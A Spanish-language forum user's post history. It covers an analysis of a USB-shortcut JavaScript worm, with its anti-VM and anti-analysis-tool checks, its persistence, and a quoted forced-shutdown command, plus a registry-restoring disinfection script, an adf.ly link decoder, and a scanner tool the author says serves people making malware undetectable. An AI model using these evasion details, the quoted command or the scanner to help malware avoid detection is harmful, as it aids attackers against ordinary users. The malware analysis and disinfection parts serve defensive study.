Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=36&ms=au&upn=hhv_O7PIcl0&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Csource%2Cupn%2Cexpire&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&pcm2=no&mime=video%2F3gpp&pl=20&source=youtube&dur=236.286&lmt=1394291766906263&key=yt6&ipbits=0&gcr=bo&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=04F7754230405A8FC022D3537A2E316F4323C905.9A15CDF618BEB230096EE39F0EC26DAC16900FAE&pcm2cms=yes&signature=&type=video/3gpp; codecs="mp4v.20.3, mp4a.40.2"&title=Imagine Dragons - Demons (Official)
Formato: 3gpp
Calidad: small
*************************
Url: http://r1---sn-o0x85uxa-a2ce.googlevideo.com/videoplayback?mt=1448075110&mv=m&initcwndbps=180000&itag=17&ms=au&upn=hhv_O7PIcl0&sparams=dur%2Cgcr%2Cid%2Cinitcwndbps%2Cip%2Cipbits%2Citag%2Clmt%2Cmime%2Cmm%2Cmn%2Cms%2Cmv%2Cpcm2%2Cpcm2cms%2Cpl%2Csource%2Cupn%2Cexpire&mm=31&mn=sn-o0x85uxa-a2ce&expire=1448096854&pcm2=no&mime=video%2F3gpp&pl=20&source=youtube&dur=236.472&lmt=1394291698741556&key=yt6&ipbits=0&gcr=bo&fexp=9407156%2C9408710%2C9413137%2C9416126%2C9417683%2C9419445%2C9419837%2C9420452%2C9421097%2C9421166%2C9421411%2C9422323%2C9422541%2C9422596%2C9422618%2C9422838%2C9422992%2C9423042%2C9423431%2C9423489%2C9423643%2C9423662%2C9423667%2C9424509%2C9424740&id=o-APsq1d2t11trGfv2qYsVS9NyPHMMqsQcMSBaV7pEXwYP&sver=3&ip=161.22.129.235&signature=864F4C8D6C43652AA8CE344C5DBD12CA1B88FFBE.1996D808B12B0ED01CF517E5736FF2F9D0872855&pcm2cms=yes&signature=&type=video/3gpp; codecs="mp4v.20.3, mp4a.40.2"&title=Imagine Dragons - Demons (Official)
Formato: 3gpp
Calidad: small

#150

Análisis y desarrollo de malwares / Re:Virus conocido en acceso directos unidades extraibles

Noviembre 19, 2015, 05:51:47 PM

Continuando, para poder extraer el código completo, puede hacer lo siguiente:

Para limpiar el codigo un poco, del archivo toma el valor de la variable "a" y copialo en la consola de Firebug, escribiendo lo siguiente: Console.log("Aqui la variable a");.

Lo siguiente que puedes hacer es usar una herramienta online, para ordenar un poco el código:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ahora queda un poco mas legible, por ultimo solo queda comenzar a modificar/limpiar codigo basura:

te quedaria mas o menos así:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si modificas un poco mas puedes, te quedaria mas o menos asi(lo hice muy rapido, es posible que tenga errores).

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

DESINFECCIÓN:

Para desinfectarse simplemente hacen lo siguiente:

cierran el proceso con un nombre aleatorio que es la copia de wscript.exe, luego el wscript.exe
Ejemplo:

Para Restaurar todas las modificaciones que hace puedes usar este script que uso:

Código: vb

'---------------------------------------------------------
'Original por MyGeekSide
'Modificado por Norfi, Febrero 2011
'http://norfipc.com/
'---------------------------------------------------------


'--------------------------------------
'Restaura las claves del registro para ver los archivos ocultos
'--------------------------------------
on Error Resume Next

Dim objShell, objFileSystem, objTextStream, objRegex
Dim colRegexMatches1, colRegexMatches2
Dim nReturnCode
Dim strIpFileText
Dim element, i

Set geekside=WScript.CreateObject("WScript.Shell")

WScript.Echo "Se procederá a restaurar las claves del registro para poder ver todos los archivos Ocultos"

    nret33=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 1 /f",0,TRUE)
    nret43=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v SuperHidden /t REG_DWORD /d 1 /f",0,TRUE)
    nret44=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v ShowSuperHidden /t REG_DWORD /d 1 /f",0,TRUE)


    nret45=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 1 /f",0,TRUE)
    nret46=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v SuperHidden /t REG_DWORD /d 1 /f",0,TRUE)
    nret47=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v ShowSuperHidden /t REG_DWORD /d 1 /f",0,TRUE)


    nret34=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\ /v CheckedValue /t REG_DWORD /d 2 /f",0,TRUE)
    nret35=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\ /v DefaultValue /t REG_DWORD /d 2 /f",0,TRUE)


    nret36=geekside.Run("cmd /C reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ /v CheckedValue /f",0,TRUE)
    nret37=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ /v CheckedValue /t REG_DWORD /d 1 /f",0,TRUE)
    nret38=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\ /v DefaultValue /t REG_DWORD /d 2 /f",0,TRUE)


    nret39=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\ /v CheckedValue /t REG_DWORD /d 0 /f",0,TRUE)
    nret40=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\ /v DefaultValue /t REG_DWORD /d 0 /f",0,TRUE)

    nret48=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\ /v Type /t REG_SZ /d Group /f",0,TRUE)



    nret61=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoFolderOptions /t REG_DWORD /d 0 /f",0,TRUE)
    nret62=geekside.Run("cmd /C reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoFolderOptions /t REG_DWORD /d 0 /f",0,TRUE)
    nret63=geekside.Run("cmd /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableRegistryTools /t REG_DWORD /d 0 /f",0,TRUE)


nret78=geekside.Run("cmd /C taskkill /f /im explorer.exe",0,TRUE)
nret79=geekside.Run("cmd /C start explorer.exe",0,TRUE)


WScript.Echo "Ahora podrá ver todos los archivos ocultos, en su PC"



WScript. Quit(0)

Eliminan los archivos que se encuentran en %appdata%\efedsyhc\
Ejemplo de archivos creados:

Eliminas el acceso directo: empezar.lnk que se encuentra en la ruta:

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Y Listo,... xD.

Saludos.

#151

Análisis y desarrollo de malwares / Re:Virus conocido en acceso directos unidades extraibles

Noviembre 19, 2015, 01:51:37 AM

Hola.

Sugerencia:
Si quieres postear este tipo de cosas lo mejor o mas recomendable es poner una contraseña(tipo: "Infectado" o algo así), porque no falta algún usuario que le de a ejecutar(que por lo general muchos hacen eso, ejecutan sin saber lo que es y mientras no tenga un alto seguiran xD).

Comenzamos mal:

Cita de: KR4T05_...como primer post, introduciéndome a la seguridad informática, un post de un virus, no dañino sino molesto, es el típico virus que se mete en los pendrives, te oculta las carpetas.....

no dañino?, te sugiero que tomes el caso mas desfavorable(que se trate de malwares conocidos como: botnet, stealer, ransomware, rootkit,...,etc.), así te evitas dolores de cabeza(toma siempre precauciones antes de ejecutar).
Crea copias de seguridad, si estas conectado a internet mientras analizas es mejor borrar cualquier contraseña guardado en el sistema(por lo general se usan Maquinas Virtuales), utiliza Sandbox,...,etc.

Cita de: KR4T05_....., y se que mi aporte no vale de mucho, pero bueno, para introducirme al foro......

Personalmente me gusta este tipo de aportes xD, me gusta los retos, analizar su funcionamiento,ver que es lo que hace sin antes ejecutarlo,.....,etc.

Respecto a la muestra:

Realizando un analisis superficial:

En su mayoria este tipo de malware los se Ver en VBScript (.VBS o .VBE) y tan solo reemplazando el "execute" o "executeglobal" cambiar por un msgbox y de forma directa te muestra todo el código desofuscado(en ocaciones se hacen un par de cosas mas).

No conozco la sintaxis de javascript(".js" o ".jse"), pero es una muestra Interesante.

Detecta si se esta ejecutando en una Maquina Virtual.

QUEMU
VBOX
VMWare

Tambien se protege de varias herramientas que normalmente se usan para Analisis de Malware:

procexp
filemon
autoruns
gmer
regmon
procmon
regmon
tcpview
hijackthis
otl
roguekiller
combofix
wireshark
fiddler
mba(Anti-Malwarebytes)
avg
avast
mse

      etc. xD

- Bloquea Acceso a algunas herramientas del sistema( regedit, msconfig,...)
- Obtiene informacion del Sistema Operativo
- Crea valores en el regedit, para ocultar las carpetas,

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden

- Crea archivos en   "C:\Users\<Nombre_de_Usuario>\AppData\Roaming\efedsyhc"

Crea el archivo ".js" con un nombre aleatorio.
Crea una copia del "wscript.exe" con un nombre aleatorio.

- Intenta asegurarse de volver a iniciar al reiniciar la PC creando un acceso directo en:

"\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"

con el nombre: "empezar.lnk" y con un icono especifico "%systemroot%\\system32\\shell32.dll,3".
Esto quiere decir que cuando iniciará windows, iniciará "empezar.lnk" con el siguiente comando:
Ejemplo:

Código: text

"C:\Users\<Nombre_de_Usuario>\AppData\Roaming\efedsyhc\kavtdp.exe "C:\Users\<Nombre_de_Usuario>\AppData\Roaming\efedsyhc\ggxmq.js"

Donde:

kavtdp.exe -> Es la copia del archivo "wscript.exe"
ggxmq.js -> Es el archivo donde se encuentra el malware a ejecutar

Tambien vi que hace peticiones del tipo "GET" a las siguiente web's:
               - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
               - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
               - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Para verificar que esta conectado a Internet.

Peticiones del Tipo "POST" a:
               - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
               - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
               - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
               - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
               - You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Y finalmente como tu dices:

Crear Accesos Directos de las archivos que hay en "dispositivos extraibles" los mueve a la carpeta: ".Trashes", y un archivo ".BAT" con el siguiente comando:

Ejemplo:
start wscript ".Trashes\872\dehxly.js"
Donde:

872 -> Aleatorio
dehxly -> aleatorio

Cita de: KR4T05_....Si cierras el servicio WSCRIPT.exe, tu PC se apaga (shutdown /s /t 00)....

Con el Comando que lo hace es: "%comspec% /c shutdown /p /f"

#152

Softwares e ISOs / Simple Youtube Downloader by fudmario

Octubre 13, 2015, 01:07:29 AM

Hola a tod@s, estaba jugando con algunas librerias y bueno me puse a mejorar varios proyectos, aqui les dejo uno de los que actualice el código, lo hice hace tiempo(lo tenia para uso personal) y bueno le añadi algunas opciones, es bastante Simple, seguro que sirve para alguien xD.
Si encuentran algun error, favor de notificar por Mensaje Privado o SKYPE(fudmario).

Algunas Capturas:

Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Contraseña: By_fudmario

Requiere: .Net Framework 4
Comprimido en : 7zip

#153

C# - VB.NET / Re:[Function]Adf.ly Decode by fudmario[vb.net]

Septiembre 16, 2015, 08:03:46 PM

Que es lo que hace esta funcion es:

Primero descarga el codigo fuente de una url y lo almacena en la variable "data"
Luego obtiene el valor que esta entre "ysmm = '" y "'"
por ejemplo si fuese el resultado asi: "HoOmLoAc"
recorremos cada letra saltando de 2 en dos comenzado con la H,O,L,A
y luego lo hacemos de manera inversa comenzamos del final hasta la penultima letra c,o,m,o

y luego el resultado es H,O,L,A,c,o,m,o->HOLAcomo
y luego lo decodificamos en base64 (el resultado real que obtenemos será de la forma 64http:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login )
omitimos las 2 primeras letras y Listo URL Decodificada.

Ahora respecto a tus dudas:
Al principio Inicializamos una nueva instancia de la clase System.Text.StringBuilder.
Dim sb as New StringBuilder
Con el For recorremos cada letra desde 0 hasta la longitud de la cadena que obtuvimos aumentado de dos en dos.
y con el sb.Append(s(i)) lo que hace es: Anexar a sb la representación en forma de cadena del carácter Unicode especificado.
tomando el ejemplo anterior: comienza con H luego le anexa la siguiente que seria O es decir HO->HOL y asi sucesivamente hasta llegar a :"HOLA"

y luego lo hacemos de manera inversa del final a el inicio primero "c" luego "co"->"com"->"como" seguimos anexando a la misma instancia que inicializamos.

con respecto a : Encoding.ASCII.GetString(bytes() As Byte), que mejor que la definicion que nos da:
' Resumen:
' Cuando se reemplaza en una clase derivada, descodifica todos los bytes de la
' matriz de bytes especificada en una cadena.
'
' Parámetros:
' bytes:
' Matriz de bytes que contiene la secuencia de bytes que se va a descodificar(en este caso la que obtendremos de Convert.FromBase64String(sb.ToString())).
'
' Devuelve:
' Cadena que contiene el resultado de la descodificación de la secuencia de bytes
' especificada.


Y Substring(2)

Lo que hace es empezar en una posición de caracteres especificada(en este caso 2, será la Posición inicial.) y continúa hasta el final de la cadena.

#154

C# - VB.NET / [Function] Adf.ly Decode by fudmario[vb.net]

Septiembre 16, 2015, 12:01:51 PM

Código: vbnet


   Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
        TextBox1.Text = AdflyUrlDecode("http://adf.ly/1NfMkS")
       
    End Sub

' Return: https://itunes.apple.com/us/app/game-of-thrones-ascent/id799145075

Código: vbnet

' ***********************************************************************
' Author           : fudmario
' Created          : 09-15-2015
'
' Last Modified By : fudmario
' Last Modified On : 09-16-2015
' ***********************************************************************
' <copyright file="Adfly_Decode.vb" company="fudmarioDev">
'     Copyright (c) fudmarioDev. All rights reserved.
' </copyright>
' <summary></summary>
' ***********************************************************************
Imports System.IO
Imports System.Net
Imports System.Text
Module AdflyDecode
    ''' <summary>
    '''     Decodifica una Url de Adf.ly.
    ''' </summary>
    ''' <param name="url">URL a decodificar.</param>
    ''' <returns>Retorna la Url Decodificada.</returns>
    Public Function AdflyUrlDecode(url As String) As String
        Try
            Dim sb As New StringBuilder
            Dim data As String = GetSource(url:=url)
            Dim rt As String() = {"ysmm = '", "'"c}
            Dim a As Integer = data.IndexOf(rt(0), StringComparison.Ordinal) + rt(0).Length + 1
            Dim b As Integer = data.Substring(a).IndexOf(rt(1), StringComparison.Ordinal) + 1
            Dim s As String = Mid(data, a, b)
            For i = 0 To s.Length - 1 Step 2
                sb.Append(s(i))
            Next
            For k = s.Length - 1 To 0 Step -2
                sb.Append(s(k))
            Next
            Return Encoding.ASCII.GetString(Convert.FromBase64String(sb.ToString())).Substring(2)
        Catch ex As Exception
            Return String.Empty
        End Try
    End Function

    ''' <summary>
    '''     Obtiene el Código Fuente de una Url.
    ''' </summary>
    ''' <param name="url">Url.</param>
    ''' <returns>Retorna el código fuente de una Url.</returns>
    Private Function GetSource(url As String) As String
        Try
            Return New StreamReader(WebRequest.Create(url).GetResponse().GetResponseStream()).ReadToEnd()
        Catch ex As Exception
            Return String.Empty
        End Try
    End Function
End Module

#155

Análisis y desarrollo de malwares / Multi-Scanner by fudmario v0.3 || 2015

Agosto 03, 2015, 01:35:55 AM

Hola a todos aqui les dejo una actualización del multi-scanner, los uploaders funcionaban correctamente en la version anterior
que postee, el problema estaba al momento de parsear los resultados, corregi esos errores entre otros.

Paginas WebScan:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(*Nuevo)-> Soporta ambos dominios(.ORG & .NET)(Es de Pago)
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(*Nuevo)->Todos lo creditos para Atheros14 por el SourceCode y los tests
Soporta: agregarse al menu contextual de Windows
Soporta: Drag & Drop
Agregado: la opcion proxy funciona para todas las webs(a diferencia de la anterior version que solo era para nodistribute)

queria subir un VIDEO, pero como recien acabo de formatear mi pc, no tengo herramientas, asi que les dejo
el video de la anterior version(0.2 que no publique xD)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Algunas Capturas:

Ejemplos de Reportes:

FileName : Keygens.exe
FileSize : 32,09 Kb
MD5 :40fb309eb029041ea44e08e17de6fa04
Result 16/35

BBCode by You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

AVG Free :OK
Avast :Win32:Malware-gen
AntiVir (Avira) :TR\/Dropper.Gen
BitDefender :Trojan.Generic.12194471
Clam Antivirus :OK
COMODO Internet Security :OK
Dr.Web :OK
eTrust-Vet :Win32\/LineZer0_i
F-PROT Antivirus :OK
F-Secure Internet Security :Trojan.Generic.12194471
G Data :Trojan.Generic.12194471
IKARUS Security :OK
Kaspersky Antivirus :OK
McAfee :OK
MS Security Essentials :OK
ESET NOD32 :ApplicUnwnt.MSIL\/Packed.Confuser.A
Norman :Trojan.Generic.12194471
Norton Antivirus :Trojan.Gen.2
Panda Security :OK
A-Squared :Trojan.Generic.12194471 (B)
Quick Heal Antivirus :OK
Solo Antivirus :OK
Sophos :OK
Trend Micro Internet Security :OK
VBA32 Antivirus :OK
Zoner AntiVirus :OK
Ad-Aware :Trojan.Generic.12194471
BullGuard :Gen:Variant.Symmi.47669
FortiClient :OK
K7 Ultimate :Trojan ( 003560791 )
NANO Antivirus :OK
Panda CommandLine :OK
SUPERAntiSpyware :Trojan.Agent\/Gen-Jorik.Process-1
Twister Antivirus :Virus.1C3A8E1AB65BC73A
VIPRE :Trojan.Win32.Generic=21BT

File Name: Keygens.exe

File Size: 32,09 Kb

Scan Date: 02/08/2015

Scan Result: 15/34

MD5: 40fb309eb029041ea44e08e17de6fa04

Verified By NoDistribute: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

A-SquaredTrojan.Generic.12194471 (B)
AVG Free : Clean
Ad-AwareTrojan.Generic.12194471
AntiVir (Avira)TR/Dropper.Gen
AvastWin32:Malware-gen
BitDefenderTrojan.Generic.12194471
BullGuardGen:Variant.Barys.9361
COMODO Internet Security : Clean
Clam Antivirus : Clean
Dr.Web : Clean
F-PROT Antivirus : Clean
F-Secure Internet SecurityTrojan.Generic.12194471
FortiClient : Clean
G DataTrojan.Generic.12194471
IKARUS Security : Clean
K7 UltimateTrojan ( 003560791 )
Kaspersky Antivirus : Clean
MS Security Essentials : Clean
McAfee : Clean
NANO Antivirus : Clean
NormanTrojan.Generic.12194471
Norton AntivirusTrojan.Gen.2
Panda CommandLine : Clean
Panda Security : Clean
Quick Heal Antivirus : Clean
SUPERAntiSpywareTrojan.Agent/Gen-Jorik.Process-1
Solo Antivirus : Clean
Sophos : Clean
Trend Micro Internet Security : Clean
Twister AntivirusVirus.1C3A8E1AB65BC73A
VBA32 Antivirus : Clean
VIPRETrojan.Win32.Generic=21BT
Zoner AntiVirus : Clean
eTrust-VetWin32/LineZer0_i

Código: text


FileName: Multi-Scanner v0.3 by fudmario.exe
FileSize: 3139,5 Kb
Hash MD5: 8a41d825adf05fe7da2b59ac3ca7af25

Descarga:
Ejecutable: ~~You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login~~
Nueva Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Dependencias: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Contraseña: byfudmario

Nota_1: Requiere WinRAR 5 para descomprimir.
Nota_2: Requiere que las .dll este en la misma Ruta del Ejecutable.
Nota_3: Las Librerias HtmlAgilityPack y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login vienen embebidas en el ejecutable.

PD_1: Si van a postear en otros foros, por favor no poner links de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login o Similares,...
PD_2: Si alguien puede agregar algun Mirror, para evitar alguna caida xD.

PARA LOS DESCONFIADOS:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#156

Análisis y desarrollo de malwares / Re:Multi-Scanner v0.1 | by fudmario

Junio 07, 2015, 06:19:27 PM

Necesitas actualizar Winrar 5+

#157

Análisis y desarrollo de malwares / Re:Multi-Scanner v0.1 | by fudmario

Mayo 29, 2015, 10:06:08 PM

Gracias a todos por Comentar,....

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
HOLA!!!

Muy bueno FudMario, esta muy lindo el programa, por casualidad me podrias informar como obtienes los proxys, son parseados a mano o de algun api?

GRACIAS POR LEER!!!

Son parseados a mano, bueno en realidad todo lo hace la libreria htmlagilitypack,..

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
¡Falta el soporte para You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login! La única razón por la que Google tiene sede en Málaga. (Gracias a Bernardo Quintero)

Bueno en realidad, esta herramienta lo hice para los que indetectan malware y como virustotal envia muestra a los AVs decidi no incorporarlo.

Saludos.

#158

Análisis y desarrollo de malwares / Multi-Scanner v0.1 | by fudmario

Mayo 28, 2015, 01:52:37 AM

Bueno aqui les dejo esta tonteria que hice en mis ratos libres,.xD
Es una version GUI de los scanner mas usados para analizar con diversos antivirus(o almenos los que supuestamente no envian muestras a los avs).
Para facilitarme al momento de parsear los resultados use las librerias: htmlagilitypack y You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(Newtonsoft)

Caracteristicas Principales:

Soporte para Analizar en: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Soporte para Analizar en: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Soporte para Analizar en: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login |*
Soporte para Analizar en: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Soporte de : Drag & Drop
Generador de Lista de Proxy, basado en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login |**
Todas las configuraciones se guardan en My.Settings

*nodistribute: solo admite 4 scan por dia, pero eh agregado la opcion de scanear mediante un PROXY, para scan Ilimitados.
**Por defecto solo obtiene del Tipo: Elite(Solo genera este tipo de proxy, porque en las pruebas que hice, me dieron mejores resultados con este tipo de proxy)

Algunas Capturas:

Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Contraseña: _by_fudmario_

Cualquier duda, sugerencia o error, favor de enviarme por MP o por SKYPE.

Saludos.

#159

C# - VB.NET / [C#]NET.Reflector.v7.0[SC]

Abril 01, 2015, 12:08:06 AM

Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Contraseña: M-H

#160

Dudas y pedidos generales / Re:Determinar si la ip esta encriptada

Marzo 06, 2015, 10:14:20 AM

Si quieres puedes enviarme el archivo para poder revisarlo,...

Páginas 1 ... 6 7 8 9 10